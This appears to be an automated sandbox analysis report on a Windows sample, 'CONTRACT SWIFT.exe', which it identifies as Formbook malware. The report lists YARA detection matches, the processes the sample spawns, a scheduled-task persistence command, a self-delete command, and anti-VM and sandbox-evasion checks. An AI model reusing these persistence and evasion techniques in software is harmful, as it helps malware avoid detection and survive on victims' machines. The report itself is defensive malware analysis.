Source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: CONTRACT SWIFT.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: hiCrWx.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: CONTRACT SWIFT.exe, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: CONTRACT SWIFT.exe, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@12/10

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

File created: C:\Users\user\AppData\Roaming\hiCrWx.exe

Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Mutant created: \Sessions\1\BaseNamedObjects\FoqylVbXbqyOfKRjpE
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_01

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

File created: C:\Users\user\AppData\Local\Temp\tmpF496.tmp

Jump to behavior

Source: CONTRACT SWIFT.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: CONTRACT SWIFT.exe	Virustotal: Detection: 51%
Source: CONTRACT SWIFT.exe	ReversingLabs: Detection: 67%

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

File read: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CONTRACT SWIFT.exe 'C:\Users\user\Desktop\CONTRACT SWIFT.exe'
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hiCrWx' /XML 'C:\Users\user\AppData\Local\Temp\tmpF496.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hiCrWx' /XML 'C:\Users\user\AppData\Local\Temp\tmpF496.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'	Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CONTRACT SWIFT.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CONTRACT SWIFT.exe

Static file information: File size 1051136 > 1048576

Source: CONTRACT SWIFT.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.354327049.000000000F020000.00000002.00000001.sdmp
Source:	Binary string: netsh.pdb source: RegSvcs.exe, 00000005.00000002.390764175.000000000117A000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb, source: netsh.exe, 0000000A.00000002.586356219.0000000003C87000.00000004.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: RegSvcs.exe, 00000005.00000002.390764175.000000000117A000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.390940001.00000000016CF000.00000040.00000001.sdmp, netsh.exe, 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, netsh.exe
Source:	Binary string: RegSvcs.pdb source: netsh.exe, 0000000A.00000002.586356219.0000000003C87000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.354327049.000000000F020000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: CONTRACT SWIFT.exe, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs

.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

.NET source code contains potential unpacker

Show sources

Source: CONTRACT SWIFT.exe, CAMM/ISectionEntry.cs

.Net Code: uS System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0047B70C push 28060002h; ret	1_2_0047BB61
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A855E push ds; iretd	1_2_0B4A855F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C8BD push es; ret	5_2_0041C8BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B3B5 push eax; ret	5_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B46C push eax; ret	5_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B402 push eax; ret	5_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B40B push eax; ret	5_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00415E06 push eax; ret	5_2_00415E07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00414F62 push edx; ret	5_2_00414F63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0162D0D1 push ecx; ret	5_2_0162D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037CD0D1 push ecx; ret	10_2_037CD0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314B3B5 push eax; ret	10_2_0314B408
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314C8BD push es; ret	10_2_0314C8BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03144F62 push edx; ret	10_2_03144F63
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03145E06 push eax; ret	10_2_03145E07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314B402 push eax; ret	10_2_0314B408
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314B40B push eax; ret	10_2_0314B472
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314B46C push eax; ret	10_2_0314B472

Source: initial sample	Static PE information: section name: .text entropy: 7.43962798959
Source: initial sample	Static PE information: section name: .text entropy: 7.43962798959

Source: CONTRACT SWIFT.exe, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs

High entropy of concatenated method names: '.cctor', 'DDnRBN', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

File created: C:\Users\user\AppData\Roaming\hiCrWx.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hiCrWx' /XML 'C:\Users\user\AppData\Local\Temp\tmpF496.tmp'

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CONTRACT SWIFT.exe PID: 6892, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000031385E4 second address: 00000000031385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 000000000313897E second address: 0000000003138984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_004088B0 rdtsc

5_2_004088B0

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe TID: 6896	Thread sleep time: -101452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe TID: 6972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6280	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 6924	Thread sleep time: -42000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Thread delayed: delay time: 101452			Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.347366887.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.347425535.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.367994531.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.344194372.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.367994531.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.347661786.0000000008551000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
